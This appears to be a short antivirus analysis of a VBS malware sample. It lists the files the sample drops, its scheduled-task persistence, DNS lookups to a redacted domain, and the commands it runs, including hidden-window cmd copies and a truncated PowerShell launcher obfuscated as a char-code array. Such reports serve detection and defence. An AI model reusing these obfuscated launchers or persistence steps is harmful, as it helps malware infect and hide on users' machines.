Техническая информация
- <SYSTEM32>\tasks\to aqui
- %APPDATA%\<Имя файла>.vbs
- http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/D69B561148F01C77C54578C10926DF5B856976AD.crt
- DNS ASK google.com
- DNS ASK re######istaserrana.com.br
- '<SYSTEM32>\wscript.exe' "%APPDATA%\<Имя файла>.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $POQWEHJFVNLVR=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,1...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%APPDATA%" /Y' (со скрытым окном)
- '<SYSTEM32>\wscript.exe' "%APPDATA%\<Имя файла>.vbs"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $POQWEHJFVNLVR=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,1...
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%APPDATA%" /Y
- '<SYSTEM32>\taskeng.exe' {00342EC8-7699-42D6-8676-758C6F037D11} S-1-5-21-1960123792-2022915161-3775307078-1001:bxgggoz\user:Interactive:[1]